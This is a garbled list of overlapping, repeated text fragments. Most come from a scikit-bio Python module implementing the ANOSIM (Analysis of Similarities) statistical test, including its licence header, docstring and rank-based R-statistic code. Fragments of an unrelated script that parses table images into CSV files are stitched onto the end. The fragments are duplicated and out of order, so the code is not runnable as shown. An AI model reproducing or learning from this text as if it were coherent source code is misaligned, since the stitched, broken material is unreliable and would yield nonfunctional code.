Analysis of Similarities (ANOSIM) is a", "more groups of objects are significantly different based on a categorical factor. The", "absolute_import, division, print_function import numpy as np from scipy.stats import rankdata from ._base", "_compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return", "# Copyright (c) 2013--, scikit-bio development team. # # Distributed under the terms", "based on a categorical factor. The ranks of the distances in the distance", "def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)])", "2013--, scikit-bio development team. # # Distributed under the terms of the Modified", "Distributed under the terms of the Modified BSD License. # # The full", "extract the values in the same order that the distances are extracted #", "objects are significantly different based on a categorical factor. The ranks of the", "COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function", "package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in", "same order that the distances are extracted # from the distance matrix (see", "the values in the same order that the distances are extracted # from", "the Modified BSD License. # # The full license is in the file", "of 0 indicating random grouping. Notes ----- See [1]_ for the original ANOSIM", "upper triangle (excluding the diagonal) preserves this order. 
grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri)", "grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B", "diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): #", "grouping matrix. It is important to # extract the values in the same", "Notes ----- See [1]_ for the original ANOSIM reference. The general algorithm and", "* ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping):", "to calculate an R statistic, which ranges between -1 (anti-grouping) to +1 (strong", "ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name =", "'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM,", "0 indicating random grouping. Notes ----- See [1]_ for the original ANOSIM reference.", "are used to calculate an R statistic, which ranges between -1 (anti-grouping) to", "groups of objects are significantly different based on a categorical factor. The ranks", "method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether", "Extract upper triangle from the grouping matrix. It is important to # extract", "values in the same order that the distances are extracted # from the", "Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name =", "categorical factor. 
The ranks of the distances in the distance matrix are used", "is important to # extract the values in the same order that the", "'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor =", "np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical", "the terms of the Modified BSD License. # # The full license is", "grouping. Notes ----- See [1]_ for the original ANOSIM reference. The general algorithm", "[2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community", "= 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor", "super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4)", "(strong grouping), with an R value of 0 indicating random grouping. Notes -----", "team. # # Distributed under the terms of the Modified BSD License. #", "def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] *", "grouping) # Extract upper triangle from the grouping matrix. It is important to", "of the distances in the distance matrix are used to calculate an R", "((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute", "Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether two or", "significantly different based on a categorical factor. 
The ranks of the distances in", "= grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) #", "# extract the values in the same order that the distances are extracted", "method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" #", "where True means that the two objects are in the same # group.", "a non-parametric method that tests whether two or more groups of objects are", "[2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name =", "statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with an R", "grouping), with an R value of 0 indicating random grouping. Notes ----- See", "from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method", "under the terms of the Modified BSD License. # # The full license", "triangle from the grouping matrix. It is important to # extract the values", "executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests whether two", "import numpy as np from scipy.stats import rankdata from ._base import CategoricalStats class", "ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``, available in", "statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0]", "that tests whether two or more groups of objects are significantly different based", ".. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal", "are significantly different based on a categorical factor. 
The ranks of the distances", "rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\"", "def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create", "is a non-parametric method that tests whether two or more groups of objects", "# within r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B -", "similar to ``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1]", "Modified BSD License. # # The full license is in the file COPYING.txt,", "on a categorical factor. The ranks of the distances in the distance matrix", "factor. The ranks of the distances in the distance matrix are used to", "in the same order that the distances are extracted # from the distance", "is a numeric vector (e.g., # it won't work with a grouping vector", "are extracted # from the distance matrix (see self._ranked_dists). Extracting the # upper", "\"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that", "``vegan::anosim``, available in R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric", "community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\"", "R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping), with an", "+1).\"\"\" # Create a matrix where True means that the two objects are", "See [1]_ for the original ANOSIM reference. The general algorithm and interface are", "upper triangle from the grouping matrix. It is important to # extract the", "ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix where True", "distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves", "scikit-bio development team. 
# # Distributed under the terms of the Modified BSD", "BSD License. # # The full license is in the file COPYING.txt, distributed", "full license is in the file COPYING.txt, distributed with this software. # ----------------------------------------------------------------------------", "general algorithm and interface are similar to ``vegan::anosim``, available in R's vegan package", "with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy", "self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average')", "which ranges between -1 (anti-grouping) to +1 (strong grouping), with an R value", "are in the same # group. This ufunc requires that grouping is a", "statistic (between -1 and +1).\"\"\" # Create a matrix where True means that", "won't work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) #", "import absolute_import, division, print_function import numpy as np from scipy.stats import rankdata from", "the same # group. This ufunc requires that grouping is a numeric vector", "the # upper triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs]", "scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor.", "---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np from scipy.stats", "whether two or more groups of objects are significantly different based on a", "self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1", "# it won't work with a grouping vector of strings). 
grouping_matrix = np.equal.outer(grouping,", "__init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0]", "triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def", "distances are extracted # from the distance matrix (see self._ranked_dists). Extracting the #", "and interface are similar to ``vegan::anosim``, available in R's vegan package [2]_. References", "The full license is in the file COPYING.txt, distributed with this software. #", "# group. This ufunc requires that grouping is a numeric vector (e.g., #", "analyses of changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143.", "R statistic (between -1 and +1).\"\"\" # Create a matrix where True means", "value of 0 indicating random grouping. Notes ----- See [1]_ for the original", "numpy as np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats):", "changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2]", "Extracting the # upper triangle (excluding the diagonal) preserves this order. grouping_tri =", "= self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def", "in R's vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses", "numeric vector (e.g., # it won't work with a grouping vector of strings).", "The general algorithm and interface are similar to ``vegan::anosim``, available in R's vegan", "reference. The general algorithm and interface are similar to ``vegan::anosim``, available in R's", "available in R's vegan package [2]_. References ---------- .. [1] <NAME>. 
\"Non-parametric multivariate", "# Create a matrix where True means that the two objects are in", "important to # extract the values in the same order that the distances", "distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] -", "(1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of", "an R value of 0 indicating random grouping. Notes ----- See [1]_ for", "non-parametric method that tests whether two or more groups of objects are significantly", "the two objects are in the same # group. This ufunc requires that", "of changes in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. ..", "between -1 (anti-grouping) to +1 (strong grouping), with an R value of 0", "this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W", "in the distance matrix are used to calculate an R statistic, which ranges", "self._ranked_dists). Extracting the # upper triangle (excluding the diagonal) preserves this order. grouping_tri", "License. # # The full license is in the file COPYING.txt, distributed with", "---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian", "statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method that tests", "+1 (strong grouping), with an R value of 0 indicating random grouping. Notes", "matrix are used to calculate an R statistic, which ranges between -1 (anti-grouping)", "ufunc requires that grouping is a numeric vector (e.g., # it won't work", "# Distributed under the terms of the Modified BSD License. # # The", "development team. # # Distributed under the terms of the Modified BSD License.", "group. 
This ufunc requires that grouping is a numeric vector (e.g., # it", "from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities", "to +1 (strong grouping), with an R value of 0 indicating random grouping.", "np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It is important", "the distances in the distance matrix are used to calculate an R statistic,", "# upper triangle (excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return", "terms of the Modified BSD License. # # The full license is in", "that grouping is a numeric vector (e.g., # it won't work with a", "True means that the two objects are in the same # group. This", "original ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``, available", "used to calculate an R statistic, which ranges between -1 (anti-grouping) to +1", "in community structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html", ".. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name", "indicating random grouping. Notes ----- See [1]_ for the original ANOSIM reference. The", "distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import", "\"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of ecology 18.1", "---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. # # Distributed under the", "vegan package [2]_. References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes", "18.1 (1993): 117-143. .. 
[2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis", "extracted # from the distance matrix (see self._ranked_dists). Extracting the # upper triangle", "= np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W) / self._divisor", "Similarities (ANOSIM) is a non-parametric method that tests whether two or more groups", "import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is", "----- See [1]_ for the original ANOSIM reference. The general algorithm and interface", "with an R value of 0 indicating random grouping. Notes ----- See [1]_", "The ranks of the distances in the distance matrix are used to calculate", "of the Modified BSD License. # # The full license is in the", "= rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic (between -1 and", "calculate an R statistic, which ranges between -1 (anti-grouping) to +1 (strong grouping),", "the original ANOSIM reference. The general algorithm and interface are similar to ``vegan::anosim``,", "strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix.", "of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name", "or more groups of objects are significantly different based on a categorical factor.", "division, print_function import numpy as np from scipy.stats import rankdata from ._base import", "References ---------- .. [1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\"", "in the same # group. This ufunc requires that grouping is a numeric", "for the original ANOSIM reference. 
The general algorithm and interface are similar to", "This ufunc requires that grouping is a numeric vector (e.g., # it won't", "vector (e.g., # it won't work with a grouping vector of strings). grouping_matrix", "is in the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__", "= 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self,", "(excluding the diagonal) preserves this order. grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self,", "It is important to # extract the values in the same order that", "a numeric vector (e.g., # it won't work with a grouping vector of", "work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract", "to # extract the values in the same order that the distances are", "'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix,", "grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W = np.mean(self._ranked_dists[grouping_tri]) # between", "class ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric", "Copyright (c) 2013--, scikit-bio development team. # # Distributed under the terms of", "Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping,", "this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as", "grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from", "order. 
grouping_tri = grouping_matrix[self._tri_idxs] return self._compute_r_stat(grouping_tri) def _compute_r_stat(self, grouping_tri): # within r_W =", "(ANOSIM) is a non-parametric method that tests whether two or more groups of", "/ 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self, grouping): \"\"\"Compute ANOSIM R statistic", "a matrix where True means that the two objects are in the same", "from the distance matrix (see self._ranked_dists). Extracting the # upper triangle (excluding the", "a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle", "print_function import numpy as np from scipy.stats import rankdata from ._base import CategoricalStats", "grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists =", "the file COPYING.txt, distributed with this software. # ---------------------------------------------------------------------------- from __future__ import absolute_import,", "R value of 0 indicating random grouping. Notes ----- See [1]_ for the", "structure.\" Australian journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name", "self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4) self._ranked_dists = rankdata(self._dm.condensed_form(), method='average') def _run(self,", "#! /usr/bin/env python # ---------------------------------------------------------------------------- # Copyright (c) 2013--, scikit-bio development team. #", "the same order that the distances are extracted # from the distance matrix", "grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the grouping matrix. It", "ANOSIM(CategoricalStats): \"\"\"ANOSIM statistical method executor. Analysis of Similarities (ANOSIM) is a non-parametric method", "matrix (see self._ranked_dists). 
Extracting the # upper triangle (excluding the diagonal) preserves this", "long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping,", "it won't work with a grouping vector of strings). grouping_matrix = np.equal.outer(grouping, grouping)", "vector of strings). grouping_matrix = np.equal.outer(grouping, grouping) # Extract upper triangle from the", "of Similarities (ANOSIM) is a non-parametric method that tests whether two or more", "as np from scipy.stats import rankdata from ._base import CategoricalStats class ANOSIM(CategoricalStats): \"\"\"ANOSIM", "r_W = np.mean(self._ranked_dists[grouping_tri]) # between r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)]) return (r_B - r_W) /", "journal of ecology 18.1 (1993): 117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM'", "[1] <NAME>. \"Non-parametric multivariate analyses of changes in community structure.\" Australian journal of", "# # The full license is in the file COPYING.txt, distributed with this", "a categorical factor. The ranks of the distances in the distance matrix are", "of Similarities' test_statistic_name = 'R statistic' def __init__(self, distance_matrix, grouping, column=None): super(ANOSIM, self).__init__(distance_matrix,", "software. # ---------------------------------------------------------------------------- from __future__ import absolute_import, division, print_function import numpy as np", "method that tests whether two or more groups of objects are significantly different", "(e.g., # it won't work with a grouping vector of strings). grouping_matrix =", "of objects are significantly different based on a categorical factor. The ranks of", "distances in the distance matrix are used to calculate an R statistic, which", "the distance matrix (see self._ranked_dists). 
Extracting the # upper triangle (excluding the diagonal)", "(between -1 and +1).\"\"\" # Create a matrix where True means that the", "requires that grouping is a numeric vector (e.g., # it won't work with", "multivariate analyses of changes in community structure.\" Australian journal of ecology 18.1 (1993):", "# Extract upper triangle from the grouping matrix. It is important to #", "-1 (anti-grouping) to +1 (strong grouping), with an R value of 0 indicating", "matrix. It is important to # extract the values in the same order", "ranks of the distances in the distance matrix are used to calculate an", "grouping, column=None): super(ANOSIM, self).__init__(distance_matrix, grouping, column=column) self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1)", "117-143. .. [2] http://cran.r-project.org/web/packages/vegan/index.html \"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities'", "# The full license is in the file COPYING.txt, distributed with this software.", "\"\"\" short_method_name = 'ANOSIM' long_method_name = 'Analysis of Similarities' test_statistic_name = 'R statistic'", "ranges between -1 (anti-grouping) to +1 (strong grouping), with an R value of", "grouping): \"\"\"Compute ANOSIM R statistic (between -1 and +1).\"\"\" # Create a matrix" ]
[]
[ "supports PySide2 and 6 but needs to adapt to whats already imported NOT", "<reponame>ewerybody/siding<gh_stars>0 \"\"\" singlesiding supports PySide2 and 6 but needs to adapt to whats", "in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import", "PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork", "adapt to whats already imported NOT whats available! Thus we deal with it", "from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import", "sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2", "deal with it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6", "from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets,", "and 6 but needs to adapt to whats already imported NOT whats available!", "sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore,", "it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore,", "'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules:", "try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore,", "else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import", "if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in", "PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore,", "Thus we deal with it here. 
\"\"\" import sys if 'PySide6' in sys.modules:", "'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from PySide6", "QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError:", "6 but needs to adapt to whats already imported NOT whats available! Thus", "elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try: from", "import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif", "but needs to adapt to whats already imported NOT whats available! Thus we", "imported NOT whats available! Thus we deal with it here. \"\"\" import sys", "already imported NOT whats available! Thus we deal with it here. \"\"\" import", "sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2'", "to adapt to whats already imported NOT whats available! Thus we deal with", "whats available! Thus we deal with it here. \"\"\" import sys if 'PySide6'", "available! Thus we deal with it here. \"\"\" import sys if 'PySide6' in", "\"\"\" singlesiding supports PySide2 and 6 but needs to adapt to whats already", "needs to adapt to whats already imported NOT whats available! Thus we deal", "with it here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import", "here. \"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets,", "import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets,", "whats already imported NOT whats available! Thus we deal with it here. 
\"\"\"", "QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else: try:", "import QtCore, QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except", "QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2", "QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork else:", "\"\"\" import sys if 'PySide6' in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork", "QtWidgets, QtNetwork else: try: from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from", "singlesiding supports PySide2 and 6 but needs to adapt to whats already imported", "from PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore, QtWidgets,", "PySide2 and 6 but needs to adapt to whats already imported NOT whats", "PySide6 import QtCore, QtWidgets, QtNetwork except ImportError: from PySide2 import QtCore, QtWidgets, QtNetwork", "we deal with it here. \"\"\" import sys if 'PySide6' in sys.modules: from", "NOT whats available! Thus we deal with it here. \"\"\" import sys if", "to whats already imported NOT whats available! Thus we deal with it here.", "in sys.modules: from PySide6 import QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from", "QtCore, QtWidgets, QtNetwork elif 'PySide2' in sys.modules: from PySide2 import QtCore, QtWidgets, QtNetwork" ]
[ "main(direc): direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv =", "all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path)", "directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc):", "fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc = sys.argv[1]", "path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list", "import glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author:", "tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9", "-*- import pandas as pd import os import time import glob import sys", "python # -*- coding: utf-8 -*- import pandas as pd import os import", "for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc", "''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 '''", "with open(output_file, \"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__", "import os import time import glob import sys import textract_python_table_parser as tptp '''", "file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file =", "as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version:", "coding: utf-8 -*- import pandas as pd import os import time import glob", "the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc): \"\"\"get the lists of all files under", "'*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file", "time import 
glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py", "under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list", "textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python", "glob import sys import textract_python_table_parser as tptp ''' File name: testract_all.py Author: <NAME>", "glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code", "12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def get_direc(direc):", "direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\") as fout:", "import time import glob import sys import textract_python_table_parser as tptp ''' File name:", "as pd import os import time import glob import sys import textract_python_table_parser as", "\"wt\") as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\":", "of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png') direc_list =", "Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory", "print('output file saved: ', output_file) if __name__ == \"__main__\": direc = sys.argv[1] main(direc)", "Date created: 12/08/2021 Python Version: 3.9 ''' #change to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/", "= get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new", "file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc +", "tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with 
open(output_file,", "= glob.glob(path) return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list:", "file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new,", "<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- import pandas as pd import", "return direc_list def main(direc): direc_list = get_direc(direc) for file in direc_list: file_code =", "as fout: fout.write(table_csv) print('output file saved: ', output_file) if __name__ == \"__main__\": direc", "table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code)", "the lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png', '*png')", "= file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc,", "direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file) direc_new = direc + 'csv' output_file", "= os.path.join(direc, direc+'png', '*png') direc_list = glob.glob(path) return direc_list def main(direc): direc_list =", "File name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change", "-*- coding: utf-8 -*- import pandas as pd import os import time import", "\"\"\"get the lists of all files under the directory\"\"\" path = os.path.join(direc, direc+'png',", "direc_list = get_direc(direc) for file in direc_list: file_code = file.split('/')[-1].split('.')[0] table_csv = tptp.get_table_csv_results(file)", "name: testract_all.py Author: <NAME> Date created: 12/08/2021 Python Version: 3.9 ''' #change to", "direc_new = direc + 'csv' output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code) with open(output_file, \"wt\")", "to the directory #cd /Users/apple/Desktop/research_fellow_documents/process_illinois/ def 
